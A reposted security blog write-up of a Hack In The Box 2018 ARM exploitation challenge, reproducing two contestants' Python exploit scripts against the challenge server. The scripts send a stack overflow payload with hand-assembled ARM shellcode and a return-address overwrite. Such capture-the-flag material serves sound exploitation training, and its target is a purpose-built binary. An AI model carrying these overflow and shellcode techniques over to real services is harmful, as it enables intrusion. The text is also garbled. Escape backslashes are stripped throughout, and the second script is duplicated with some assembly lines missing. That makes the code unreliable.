beVX Conference Challenge – HiTB

June 22, 2018 admin Conferences

Credit to Author: SSD / Noam Rathaus| Date: Fri, 22 Jun 2018 11:30:44 +0000

During the event of Hack In the Box, we launched an ARM reverse engineering and exploitation challenge and gave the attendees the change to win great prizes.

The challenge was divided into two parts, a file – can be downloaded from here: https://www.beyondsecurity.com/bevxcon/bevx-challenge-10 – that you had to download and reverse engineer and server that you had to access to have a running version of this file.

The challenge consisted of a binary that is acting as a ‘server’ which expects incoming connections to it, when an incoming connection occurs and a certain ‘protocol’ is implemented and it will print out ‘All your base’ and exit. The challenge was to write an exploit that will cause the program to print out ‘Belong to us!’.

The intended way of solving this challenge was to preform an overflow and cause the execution path of the code to change, while one of the solutions provided did not follow this path – and was still able to change the output of the program.

We received several submissions, only two were complete and solved the challenge completely, others were close but did not meet our minimum requirements and therefore are not presented here.
ebux25
In this submission, the execution path is not overwritten rather the string displayed is changed such that the program does not crash while it still prints the required string. While this was not the intended idea of the challenge, there was no rule against this kind of solution.

 #————————————————————–  #  # Bevx challange submission 2 (https://www.beyondsecurity.com/bevxcon/bevx-challenge-10)  #  by Gergely Eberhardt (@ebux25)  #       #  # Usage:  #   bevx_exp.py <server ip address>  #  #————————————————————–    import socket  import sys  import struct  import binascii    if (len(sys.argv) < 2):      print ‘bevx_exp.py addr’    port = 2323  addr = sys.argv[1]    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((addr, port))  #message = ‘x12xffx2fxe1’+’Belong to us!’  message = ‘x12x1fx2fx11’+’Belong to us!’    # initialize buffer  #   8 bytes: id  #   message  #   dummy  data = ‘;*k%:Znx01’+message+’ ‘*(0x78-len(message))  data += ‘x11x12xd8x00’+’x0cx00xdaxda’+’x15x12xd8x00x00x00x00’    print binascii.hexlify(data)  s.sendall(data)    s.sendall(message)

yohanes
The solution provided by yohanes, was meeting more our expectations to what we were looking, it changes the execution code path.

 #Yohanes Nugroho  #Twitter/github/gmail: @yohanes/@yohanes  import socket  import struct  import sys    if len(sys.argv)<2:      print “usage: client.py <host> n”      print “will use port 2323n”      exit(0)    host = sys.argv[1]    ch2 = “3a5a6e01”.decode(“heX”)  ch1 = “3b2a6b25”.decode(“hex”)  r2 = “xc6x80x5ax17”   r3 = “xe1x80x80xcd”  ip =  “x80x74” #ROP TO id87480    # r2 ^ r3 will result in address 0xdada0027    payload_asm = “””  #overwrite string  movs r0, r0   movs r0, r0  str r3, [r3]  movs r2, #8  strb r2, [r3] ; offset to string belong to us  ldr r3, [r3]  movs r2, #13  lsls r2, r2, #4  lsls r2, r2, #4  adds r2, #76  negs r2, r2  add r2, r2, r9  ldr r2, [r2]  ldr r2, [r2]  ldr r4, [r3]  str r4, [r2]  ldr r4, [r3, 4]  str r4, [r2, 4]  adds r3, r3, #8  adds r2, r2, #8  ldr r4, [r3]  str r4, [r2]  ldr r4, [r3, 4]  str r4, [r2, 4]  #return  movs r2, #14  lsls r2, r2, #4  lsls r2, r2, #4  adds r2, #53  negs r2, r2  add r2, r2, r9  bx r2  “””    payload = “x00x00x00x00x1bx60x08x22x1ax70x1bx68x0dx22x12x01x12x01x4cx32x52x42x4ax44x12x68x12x68x1cx68x14x60x5cx68x54x60x08x33x08x32x1cx68x14x60x5cx68x54x60x0ex22x12x01x12x01x35x32x52x42x4ax44x10x47”      payload += “x00x68” # this will make it crash, used to check register values    n = 128 – 38 – len(payload)   #print “LEFT “, n # how much shell code space left    tous = “Belong to us!x00”  padding1 = “B” * (30 – len (tous))    padding2 = “A” * n  pl = ch1+ch2+tous + padding1+ payload + padding2 +r2 + r3 + ip     #this will make sure we can encode/decode the string as UTF-8  print “IS OK “, pl.decode(“utf-8”).encode(“utf-8”)==pl  print “Sending payload n”, pl    s = socket.create_connection((host, 2323))  s.sendall(pl)    s.recv(1)

#Yohanes Nugroho

#Twitter/github/gmail: @yohanes/@yohanes

import socket

import struct

import sys

if len(sys.argv)<2:

print “usage: client.py <host> n”

print “will use port 2323n”

exit(0)

host = sys.argv[1]

ch2 = “3a5a6e01”.decode(“heX”)

ch1 = “3b2a6b25”.decode(“hex”)

r2 = “xc6x80x5ax17”

r3 = “xe1x80x80xcd”

ip = “x80x74” #ROP TO id87480

# r2 ^ r3 will result in address 0xdada0027

payload_asm = “””

#overwrite string

movs r0, r0

str r3, [r3]

movs r2, #8

strb r2, [r3] ; offset to string belong to us

ldr r3, [r3]

movs r2, #13

lsls r2, r2, #4

adds r2, #76

negs r2, r2

add r2, r2, r9

ldr r2, [r2]

ldr r4, [r3]

str r4, [r2]

ldr r4, [r3, 4]

str r4, [r2, 4]

adds r3, r3, #8

adds r2, r2, #8

ldr r4, [r3]

str r4, [r2]

ldr r4, [r3, 4]

str r4, [r2, 4]

#return

movs r2, #14

lsls r2, r2, #4

adds r2, #53

negs r2, r2

add r2, r2, r9

bx r2

“””

payload = “x00x00x00x00x1bx60x08x22x1ax70x1bx68x0dx22x12x01x12x01x4cx32x52x42x4ax44x12x68x12x68x1cx68x14x60x5cx68x54x60x08x33x08x32x1cx68x14x60x5cx68x54x60x0ex22x12x01x12x01x35x32x52x42x4ax44x10x47”

payload += “x00x68” # this will make it crash, used to check register values

n = 128 – 38 – len(payload)

#print “LEFT “, n # how much shell code space left

tous = “Belong to us!x00”

padding1 = “B” * (30 – len (tous))

padding2 = “A” * n

pl = ch1+ch2+tous + padding1+ payload + padding2 +r2 + r3 + ip

#this will make sure we can encode/decode the string as UTF-8

print “IS OK “, pl.decode(“utf-8”).encode(“utf-8”)==pl

print “Sending payload n”, pl

s = socket.create_connection((host, 2323))

s.sendall(pl)

s.recv(1)

https://blogs.securiteam.com/index.php/feed